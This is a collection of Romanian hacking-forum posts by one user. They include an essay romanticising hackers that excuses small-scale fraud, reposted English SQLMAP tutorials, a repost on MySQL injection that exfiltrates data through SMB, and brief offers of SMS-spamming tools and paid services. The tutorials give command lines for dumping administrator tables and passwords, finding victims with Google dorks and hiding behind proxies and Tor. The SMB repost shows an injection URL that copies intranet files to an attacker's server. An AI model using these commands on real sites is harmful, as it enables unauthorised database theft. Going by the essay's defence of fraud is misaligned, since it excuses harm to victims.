Paul4games

@root_prime pentru ca poate eu gresc si alti ma pot corecta si poate au o intelegere mai buna asupra acestui lucru @TheWiner poti oricand sa inchizi tabul cu acest topic daca nu iti convine ceva si vrei doar sa faci un post in plus.

Am inteles acum tromfil ce ai vrut sa spui, da este si asta o perspectiva dar mai sunt destui oamnei inteligenti care sunt jigniti si descurajati de cei inteligenta mai redusa prin acest fapt mutli au motive sa creada ca sunt ratati daca sunt aproape tot timpul criticati de alti care nu se vad pe ei, cum spunea cineva:"Ca sa iti dai seama ca esti prost ai nevoie de ceva inteligenta".

@Tromfil hai sa vorbim serios, nu exista foarte multe cazuri de astfel de oameni de care ai dat tu exemplu, cred ca majoritatea dintre noi iesim in lume( la o bere cu prieteni/un fotbal/un chef/etc..) .

@Skiddie din cate vad tu nu ai nici o legatura cu topicul @bogdan da nu mi-am dat seama pe moment si fraza aceea nu am scriso bine, aveam prea multe idei in cap si am incurcat ideeile. @nedo da ai dreptate in legatura cu copii si adulti.

Nu merge nici cu EDIT sa formatezi textul si da am cautat documentare si chesti de genul dar majoritatea nu prea au legatura cu ce am scris eu aicimacar ai citit ce am scris" si dac anu ti-a placut poti tot timpul sa nu mai citesti si sa inchizi tabul cu acest topic.

In ultimul timp am tot stat si m-am gandit la acest lucru, de ce sunt hackeri priviti ca niste zei prin ochii unui copil dar ca niste infractori prin ochii unui adult?m-am tot gandit de ce cineva care cauta cunoasterea,este entuziasmat si curios de cum merg lucrurile, incearca sa le inteleaga si vrea sa stie ce se afla dupa acel simplu prompt de login, de ce a aparat aceea eroare si cum poate fi exploatata si fixata,ce este in interiorul acelui site.Pentru a-si hrani foamea de cunostinta si nu pe cea de bani este considerat un criminal,un infractor de cei care nici nu inteleg ce face el si nici macar nu incearca sa inteleaga ceea ce reprezinta el.Cum este sa incerci sa patrunzi intr-un site o zi intreaga doar pentru a-ti depasi limitele si a putea spune: "Am reusit, am luat acces!", iar dupa aceea sa fi intitulat un criminal de cei care nici macar nu te cunosc ca sa stie ce fel de persoana esti, sa stie cat de destept esti si ce poti sa faci doar cu mintea ta? Suntem priviti de societate ca niste infractori periculosi care ar trebui inchisi pentru ca suntem mai inteligenti decat majoritatea celor care nu ne inteleg, pentru ca suntem o amenintare directa la adresa diferitelor guverne si puteri deoarece informatia si inteligenta noastra ne permite sa facem ceea ce oricine ar putea face doar ca nu s-a straduit sa invete cum, pentru ca facem ce credem noi ca este bine si nu ceea ce vor ei sa credem, pentru ca suntem deosebiti de ceilalti si mai greu de manipulat si sclavit, pentru ca nu suntem intelesi de ceilalti si cei ca noi trebuie inlaturati si inchisi pentru simplul fapt ca am vrut sa stim mai mult, pentru ca ne-am straduit sa intelegem cum functioneaza roata si de ce se invarte, pentru ca am fost curiosi si am invatat ceea ce este interzis dar este ca un drog pentru noi, pentru asta trebuie sa fim inchisi? pentru ca detinem cunostiinte intersize prin legi date de cei care cred ca browserul esgte tot internetul, ca windowsul este calculatorul? Eu am ajuns la concluzia ca urmatoarele lucruri ii determina pe oameni sa creada ca suntem niste criminali: 1.Mass-media manipuleaza de foarte mult timp oameni si este si cazul nostru. Oamenii au fost facuti sa creada prin stiri/ziare ca suntem niste infractori deoarece am "spart" un site, dar aproape tot timpul "uita" sa precizeze motivele noastre, "uita" sa spuna ca noi nu am stricat nimic,nu am facut nici o paguba,doar am vrut sa vedem ce este ascuns inauntru sia m facut un public disclousure fara sa afectam cu nimic sistemul! 2.Omenirea se teme de ceea ce nu cunoaste, nu exista foarta multa lume care vrea sa exploreze necunoscutul si sa il inteleaga,asa se intampla si cu noi,majoritatea populatiei nu vor sa ne inteleaga. 3.Oamenii nu fac diferenta dintre noi si cei care se ocupa cu fraudele(carderi) doarece nimeni nu incearca sa le explice diferenta....desigur poate mai facem si noi fraude pentru a castiga ceva bani/obiecte pentru ca nu toti stam in vile luxoase si avem doar haine de firma, un castig in plus nu strica nimanui,unii dintre noi nu vrem sa depindem de parinti care sunt la fel ca restul(nu ne inteleg chiar daca incerci sa le explici de n ori) sau poate vrem sa ne platim facultatea dar nu avem destui bani asa ca incercam sa si castigam ceva din tot ce am invatat dar NU intrecem limita, NU facem fraude de mii de dolari si NU ne lacomim. 4.Cum am spus la inceputul acestui topic in ochii unui copil suntem priviti ca niste zei deoarece el inca ami are aceea doarinta de cunoastere si vrea sa ajunga ca noi, cred ca majoritatea am inceput la varste destul de fragede si am invatat din placere si dorinta de cunoastere( sa nu neglijam bani, timpul trece,ne maturizam si apar si abni in joc si o sa mai facem diferite lucruri si pentru bani dar a ajuta pe cineva contr-cost mi se pare perfect normal daca nu iti este tovaras).Adulti deja si-au pierdut dorinta de cunoastere si au fost deja manipulati de mass-media, putin dintre ei mai vor sa ne inteleaga sis a fie ca noi, au aparut alte probleme care sa ii procupe de 100 ori mai mult decat sa fie ca noi(sa ai ce sa dai de mancare la copii,sa mergi la munca ca daca nu tu atunci cine?). 5.Asa numiti "script kiddies" care ne strica imaginea prin incercarea lor de a se face afirmati si a deveni celebri prin diferite metode, defaceuri fara motiv, distrugerea muncii altuia si multe alte lucruri.Noi incercam sa ii combatem si sa ii indepartam din jurul nostru dar continua sa vina ca mustele la rahat. Voi ce credeti, de ce suntem considerati criminali si ce ar trebui sa facem sa ne inbunatatim imaginea? Ps: Am citit un manifesto scris de un tip care avea nickul "The Mentor" si care m-a pus mult pe ganduri si m-a socat prin cat de multa dreptatea avea omul desi a scris acest manifest in 1986 cand nici nu eram nascut: .:: Phrack Magazine ::. LE:Nu stiu de ce dupa ce am dat submit s-a futut alinierea textului....

Xander in timpul care o sa iti ramana fara calcualtor, inveti electronica si iti creezi propriul tau calculator dar tu ii dai denumirea de muieguvernul si nu mai prea au ce sa iti faca....

Un raport foarte bun, este dreptul tau sa utilizezi ceva pentru care ai platit si care nu ar trebui fi detinut de nimeni.

daca il luati de pe siteul oficial este clean 100%,inca este prima versiunea si mai are buguri,asa ca daca gasiti vreunul sau nu poate decoda un file faceti un thread pe decodeby.us.

Unul dintre cele mai bune tutoriale despre XSS: http://xsser.sourceforge.net/xsser/XSS_for_fun_and_profit_SCG09_(english).pdf

Last time we were using SQLMAP from Windows platform and could not realize its full potential so today I will be trying to teach you how to use it from Linux platform to take advantage of all that it has to offer. Full:Kaotic Creations: Owning the Database with SQLMAP and METASPLOIT

1) You need to be safe, so this is crucial. I assume you already have a trusted VPN connected and now to be extra ninja we are also going to route traffic through proxies. We can accomplish this by simply setting the '--proxy=PROXY' parameter which will enable use of proxies during scanning. EX: sqlmap.py -u http://site.com/example.php?id=1 --proxy=http://proxysite.com:PORT You can also supply credentials with the '--proxy-cred=user:pass' argument 2) You can speed scans by increasing the THREAD count, since the default is set to 3 request at a time. 2a) If you set this beyond the default you may want to also set the '--delay=DELAY' parameter to allow some strategic delays between requests (or to speed up even further, although I have a feeling this leads to errors which other tools are prone to (cough..Havij) 2b) You can use the '-o' switch to enable all of the optimiZation features at once 2c) If you are performing time based attacks or blind injections then it may be a better idea to leave thread count alone and use the '--predict-output' argumernt which will save you a bit of time and will allow SQLMAP to perform some analysis on found results in session file to help speed things up (can slow things down in other scenarios where the '-o' option is much better choice. 3) You can have the tool load different USER-AGENTS in case a site or page has restrictions based on browser type. This can be accomplished by adding the '-a <insert/path/to/file>' parameter to your command string. It needs to be followed by the path to the file containing the USER-AGENTs to be used. You can run a few searches on Google to find some common ones or how to come up with your own custom USER-AGENT. NOTE: this may have been replaced by --user-agent=<insert user agent details> with latest update 3a) there is a default list provided with installation that you can add to or see how they are modeled located at: '~\sqlmap\txt\user-agent.txt' *3b) you can also just let SQLMAP do the deciding by issuing the '--random-agent' 4) If you need to fake out the referer in the request due to restrictions on server side you can change the default values by using the '--referer=<http://www.insert/REFERER/page/.com/%3E' 5) Need credentials to perform a more in depth scan? No problem! We can set the credentials using the '--auth-cred' followed by credentials in the typical 'user'':''pass' format EX: --auth-cred=user:password or --auth-cred=admin:IhazYourPazword! 6) You can load targets using GOOGLE and DORKS, by using the '-g' argument followed by the search dork in quotes "" EX: sqlmap.py -g "inurl:index.php?id= site:us" NOTE: It will work on any targets found in an interactive manner but only the arguments passes with original command will be used on each target so make sure you use some basics but not too much. EX: sqlmap.py -g "inurl:index.php?id=" -b --current-user --current-db --is-dba --dbs 6a) You can also process more than one site request at a time from a file by changing the standard '-u' to '-r <path/to/load/HTTP/requests/from/>' 7) You can save and resume scans and data retrieved in session file (in "output" folder) to save time, or to pick things back up where you last left off. You need to use the '-s <insert/path/to/session/file>/session' parameter to tell it where to look to parse results from. NOTE: Point it directly at the session file and not just the folder it is in or it wont load properly. You can also use the recorded scan details to learn a LOT. It contains info on the queries used to get all the details as well as everything found, so it is a good reference and learning tool (all dumps are converted to .CSV files which are above and beyond the log and session files that are saved). 8) You can use the '--eta' paramter to have the scans keep an ETA so you have an idea of how long things are going to take. This come in handy when doing dumps of database to give you an idea of how long it thinks it will take (very useful when blind or trying to make determination as to whether or not it makes sense to dump a questionable table in full or just what you need. Remember if it looks like it will take too long you can use the '-s' argument to pick it back up later See step 7 above) 9) You can use '--flush-session' to clear out the results stored for a session file if you need to just start over, or in case the admin has come along and made some changes since your last visit 10) The last one I will leave you with is very important if you are working on Linux machine, like Backtrack, to make sure you have the latest version of SQLMAP as it is constantly being worked on and new developments constantly being released. This can be accomplished by a quick addition of the '--update' argument. EX: sqlmap.py --update NOTE: if you are working on Windows then you can either check the SQLMAP homepage often for updated version to download or you can try the Windows SVN client called TortoiseSVN GUI, and can be found here and is available for both 32 and 64 bit computers: TortoiseSVN You just download and install, then navigate to the SQLMAP install folder in Windows Explorer and you will now have green icon next to those folders that can be updated by SVN. Just right click and choose the option to SVN UPdate folder contents. Once it is done you have updated copy. BONUS Material: 1) When attacking version 4 databases with no information schema to rely on there are still several options with SQLMAP: 1a) You can use the '--common-tables' and '--common-columns' arguments to try and bruteforce the table and column names. The default list is much greater than Havij and other tools and can easily be added to if you want to beef it up, it as well as many others used can be found at: ~\sqlmap\txt\*.txt 2) If you dont get any positive results from injection but you have a gut fealing that the site is vulnerable then you can try increasing the '--level' or '--risk' arguments beyond the default level of 1. When you do this it will allow SQLMAP to perform more intense attacks and check for additional injection points such as the cookie field, user-agent field, and even the referer field. I typically will add '--level 3 --risk 3' to my command string if I dont get what I am looking for and have a strong feeling there is an injection point that is some how being overlooked. 3-X)=Updates recently introduced: ' --batch' allows you to walk away from the terminal and let SQLMAP make all of the decisions on your behalf fro all instances where it would usually prompt for interaction, a true hands free experience ' --schema' which can be used to enumeate the databases or schema ' --parse-errors' which tells SQLMAP to parse the error messages from response pages received from queries - helpful when using google dorks ' --mobile' which like the user-agent argument allows SQLMAP to act as if it was a mobile device, which can be handy in testing many of the new mobile.site.com spin-off domains to help reach ever expanding consumer markets with very little concern for security or sanitization Last, but certainly not least as this can be very helpful in adding to YOUR security: ' --tor' which enables SQLMAP to perform queries through the default TOR proxy setup address Mini-Tutorial on the: --forms So you want to inject a search form or try to bypass basic login page (with the typically two input fields such as user and pass), you can either pass to sqlmap the request in a request file (-r) as noted aboved, or you can set the $POST data accordingly using the '--data' argument,... ...or let SQLMAP do it for you! Both user and pass from above example, as do others in real life, appear as <form> and <input> tags in HTML code. This is where this switch will get to perform its handy work. Provide SQLMAP with '--forms' as well as the page where the form can be found as the target url '-u' and SQLMAP will do the rest, by parsing the forms it has found on page provided and will interactively guide you through to test for SQL injection on the form input fields (rather than performing a normal injection scan on site provided by '-u'). Hope these help you with the tool SQLMAP a little bit more. Still working on adding some more instructions and tutorials regarding the additional features that interact with the filesystem, system registry, and actual command execution with a little help from Metasploit. I am also planning a separate short article on how to perform injections via $POST Sursa:Kaotic Creations

There are times when manual efforts just wont work or you plain dont have the skills and other famous tools like Havij dont seem to do the trick either. I experienced one of these times recently and it lead me to another great tool that just doesn't seem to be as popular - SQLMAP. I had a site the other day I was working on my injections with and could not get it manually due to poor skills at timing things, reading results, and PATIENCE. Havij was cracking out due to timing method sucking and I dont have skills to do it manually (props to those that can), so here is a tutorial I put together on how to go about cracking this thing wide open using the less commonly known tool SQLMAP. Let me first start by saying if you are afraid of the command line then just leave now because there is no GUI for this and I dont think there ever will be. If you really want to hack you need to get familiar with it so why not start now. Let's begin... There is no need to waste time with $hitcash and other download sites. For a stable and virus free copy just get from the official site here: sqlmap: automatic SQL injection and database takeover tool You will simply extract this to the desired folder you want to run and use it from. As mentioned this is a command line tool, NO GUI. If you want to add it to your path variable so you can run it from anywhere the command prompt opens by following these simple steps: 1) Right click on Computer and choose Properties option 2) In the System window click on Advanced system settings in the left pane 3) In the System Properties window select Advanced tab and click on Environment Variables 4) In the Environment Variables window you will notice two columns User variables for a username and System variables - we need the user variable to the PATH so it knows where to open the program wherever we decide to open CMD from 5) Now to add a PATH to the User variable, highlight PATH and click on New… button. In the New User Variable dialog box type the Variable name and Variable value and click OK button. If you are unsure you can choose to edit the PATH variable to see how it is done (IF YOU CHANGE THIS YOU MAY HAVE PROBLEMS, SO BE CAREFULL, now just add path to sqlmap.exe to the end and your done, hit OK and save. 5a) To remove a User variable click on the required User variable and then click on Delete button 5b) To edit a User variable click on Edit… button. In the Edit User Variable dialog box edit the Variable name and Variable value and click OK button NOTE: you can skip the path variable part if you want but then you must be in the folder to run it from command line (I am lazy and dont like to navigate so I like to set it and forget it) OK now you should be ready to get started...open the command prompt and type sqlmap or sqlmap.exe to see if you set the path variable correctly. If you get "error: missing a mandatory parameter..." then you are in business. To begin I suggest opening two command prompts at the same time and put them side by side (it will help make this easier to visualize and learn while we go through this tutorial). On one side you need to simply type in 'sqlmap --help' and see what follows, you will quickly see sqlmap has a LOT of options available for you to choose from. I will cover some of the basics to help get you started. Keep the help menu open on one side and now we will begin working from the other side. I will assume you have done your own searching on the web to find some vulnerable targets, so let's get started testing them. we will use the '-u' option to define our target site, like this: EX: sqlmap -u http://site.com/example.php?id=1 Results...PHP 5.2.14, Apache 2.2.17, MySQL 5 this will perform a basic run at the target to test for injection, simply providing basic overview info. We can use the '-f' parameter to get some more specific information from our target, like this: EX: sqlmap -u http://site.com/example.php?id=1 -f Results are not too much more than previous (you get column count or vulnerable column if you pay close attention to info retrieved as well as specifics on version). The results will also be stored for the entire session in the 'output' folder wherever sqlmap is physically installed - it also shows the commands used to get the info. That doesnt really tell us a lot so lets grab the site banner to see what it can tell us as well as some other useful info from the Database itself by changing up the command and adding a few more paramaters, like so: EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs Results: NOTE: it seems to process them in the order you pass the arguments, so if it fails along the way you dont get the rest. For this reason I usually start with the above command and then start to change from there to get more info... This pretty much gets you set up with the basic info, you can go a step further and add the '--passwords' to the end of the command to try and extract the users passwords fro database users if they are available. This is not always effective though (i.e. no MySQL table) which is why it is best to add after the basics or at the end of your recon session, like so: EX: sqlmap -u http://site.com/example.php?id=1 -f -b --current-user --current-db --is-dba --users --dbs --passwords OR by itself following our recon command like this: EX: sqlmap -u http://site.com/example.php?id=1 --passwords You can also check user priveleges '--priveleges' to check user priveleges as well as roles '--role'..., but what if you want to dig deeper into the Database(s) to find more info, no problem....let's keep going and extract all of the table names and columns... Now we need to keep it simple and just request what we need using these new parameters: '--tables', '--columns', and '-D', like this: EX: sqlmap -u http://site.com/example.php?id=1 --tables -D database1 Results....it will load all of the results into the log file stored in the "output" folder wherever you installed sqlmap physically on your system, while it also prints the results to the screen. The results would look something like this: ....and so on until it is done finding all of the tables for the database you specified with the '-D database1' paramater earlier...and now we find the columns for the tables found above... EX: sqlmap -u http://site.com/example.php?id=1 --columns -D database1 -T administrator Results....remember you can check your logs in "output" folder...The results would look something like this: ....and so it goes on until it is done finding all of the columns and tables for the database you specified with the '-D database1 -T administrator' paramaters earlier...BUT no you may be asking yourself how do we get that precious data out of there? Like this: EX: sqlmap -u http://site.com/example.php?id=1 --dump -D database1 -T administrator -C user,pass,id Results....remember you can check your logs in "output" folder...The results would look something like this: That sums up our basic introduction to SQLMAP. Ideas for next series...SQLMAP Round 2: From Dumping to Owning the DB Server. Using ninja skills with sqlmap to interact with the system registry and filesystem access, as well as gaining access to the underlying operating system and executing system commands with a little assistance from the incorporation of Metasploit to the attack scenario. I hope you enjoyed this episode and stay tuned for more to come in the next series... Sursa:Kaotic Creations

Am gasit acest blog acum cateva zile si are o grmada de articole interesante: Ack Ack « Go beyond the impossible!

Over the past week i have been busy in the lab developing new attack vectors to MySQL injections by using the inter protocol capability with the load_file() function. With load_file(); you are able to load files from another machine over SMB, this happens through the underlaying system’s SMB client, a basic load_file() over SMB looks like this: 1 select load_file("\\\\[ip | server_name]\\filename"); But also this will initialize a SMB connection: 1 select 1 INTO OUTFILE "\\\\[ip | server_name]\\filename]"; In fact, Fredrik wrote about this INTO OUTFILE problem as in a way for malware to easy spread in internal networks. After playing around i found ways of using concat() inside load_file(), this made MySQL injections look like this: 1 select load_file(concat("\\\\[ip | server_name]\\", version())) Which made everything so much easier, with this we can entirely abandon the stupid delay attacks with benchmark techniques, blind MySQL injections and maybe even replace the current basic MySQL injections because of the ease of the query’s and you don’t even have to look how much columns are selected. Now the other side of the injection, It uses the default SMB client which means that if you are able to exploit this thing while connecting to you, you can do a lot more with the system. I coded SMB server for this in Python and inserted for now just 2 exploits (but there will come more i suppose since i will be maintaining this program and making it stable over the next couple of weeks). The program can be found here. For now i embedded the following exploits: MS10-020 stack overflow Windows 7/2008R2; trans2 response stack overflow Win7_remote_kernel_boom; NetBIOS length field crash Here is a screen shot of MS10-020 in action to give you a basic idea of what i am talking about. Okay, that was just a little sidestep but this program is basically for grabbing the strings which are being defined in the MySQL injection. It will look something like this. You let the server connect to you over port 445 with it’s favorite SMB client, you catch what happens and you won. This trick is basicly also possible with bigger files instead of just tiny strings by using INTO OUTFILE, in fact you can just dump entire files from the local network that way. example: 1 http://extranet/index.php?id=1 UNION ALL SELECT 1,2,load_file("\\\\intranet\\filename"),3,4 INTO OUTFILE "\\\\Your_SMB_server\\test"; This will proxy the file in the intranet over SMB to you. I suppose this is not only working on MySQL and with investigation i suppose you can go out of band similar ways in other database level programs, this is just to break the ice and make you realize how useful it is when you are capable of going out of band with SMB. Blind MySQL injections are a lot better to exploit this way because you are capable of defining entire strings and not having to calculate every single character based on true/false responses or with delay tricks and client side SMB exploitation will have a lot bigger future with the introduction of this. I hope i provided enough information here for you to make as much fun with this as i did over the past few days and keep me posted if you find other cool tricks possible with this feature. Autor:Jelmer de Hen Sursa:Ack Ack « Go beyond the impossible! Mie mi s-a parut articolul foarte interesant si blogul de asemenea are o multime de posturi de calitate,a si era sa si uit hen a creat si un toolkit pentru a creea un server smb la tine pe pc: MySQL network exploitation toolkit 1.1

Vezi ca asta este v2,exista si o versiune 2 care face grabbing la mai multe nume.

Multa bafta si despre tinkode nu prea stiu ce sa zic,vom vedea....

La multi ani!

Eu nu prea cred ca a gasit tipul asta exploitul,am citit despre vulnerabilitatea asta acum o luna si ceva pe blogul lui: vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3r

de gasit se gasesc,problema este ca majoritatea ori au captcha ori merg doar pe 1 retea/tara

Nu l-am testat dar daca nu are captcha dupa n sms-uri si merge international atunci merge facut un program foarte usor,daca chiar este il fac eu maine doar sa stiu ca merge si nu are captcha.

Daca ai nevoie de putere de ce nu folosesti niste rdp-uri?

Conteaza tara/os?

Te rog adauga tagurile la fiecare cod ca sa se poata citi calumea.

Cartus dami pm cu id-ul tau sa discutam detaliile si te rezolv eu.